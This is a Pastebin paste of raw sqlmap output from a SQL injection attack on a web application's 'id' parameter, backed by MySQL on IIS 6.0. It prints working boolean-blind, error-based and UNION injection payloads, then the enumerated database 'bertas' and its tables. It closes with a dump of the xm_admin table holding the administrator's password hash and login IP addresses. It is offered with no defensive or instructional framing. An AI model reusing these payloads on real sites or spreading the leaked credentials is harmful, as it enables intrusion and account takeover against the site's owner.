Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=3 AND 3818=3818
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: Generic UNION query (NULL) - 12 columns
- Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
- ---
- web server operating system: Windows 2003 or XP
- web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
- back-end DBMS: MySQL >= 5.0
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=3 AND 3818=3818
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: Generic UNION query (NULL) - 12 columns
- Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
- ---
- web server operating system: Windows 2003 or XP
- web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
- back-end DBMS: MySQL >= 5.0
- available databases [2]:
- [*] bertas
- [*] information_schema
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=3 AND 3818=3818
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: Generic UNION query (NULL) - 12 columns
- Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
- ---
- web server operating system: Windows 2003 or XP
- web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
- back-end DBMS: MySQL >= 5.0
- Database: bertas
- [21 tables]
- +------------------+
- | xm_admin |
- | xm_adv |
- | xm_basic |
- | xm_benmessage |
- | xm_biao |
- | xm_blog |
- | xm_bmessage |
- | xm_certification |
- | xm_content |
- | xm_contentlist |
- | xm_download |
- | xm_firstclass |
- | xm_linkss |
- | xm_message |
- | xm_news |
- | xm_newslist |
- | xm_piclink |
- | xm_product |
- | xm_secondclass |
- | xm_userinfo |
- | xm_zhaopin |
- +------------------+
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=3 AND 3818=3818
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: UNION query
- Title: Generic UNION query (NULL) - 12 columns
- Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
- ---
- web server operating system: Windows 2003 or XP
- web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
- back-end DBMS: MySQL >= 5.0
- Database: bertas
- Table: xm_admin
- [1 entry]
- +----+------------------------------------------+-------+--------------+--------------+---------------------+---------------------+
- | id | pwd | name | loginip | ploginip | logintime | plogintime |
- +----+------------------------------------------+-------+--------------+--------------+---------------------+---------------------+
- | 1 | e75252b57f7506a5b55b4515f1940a0715dd96d5 | admin | 59.58.175.66 | 59.58.175.66 | 2015-09-24 09:51:12 | 2015-09-23 09:54:57 |
- +----+------------------------------------------+-------+--------------+--------------+---------------------+---------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement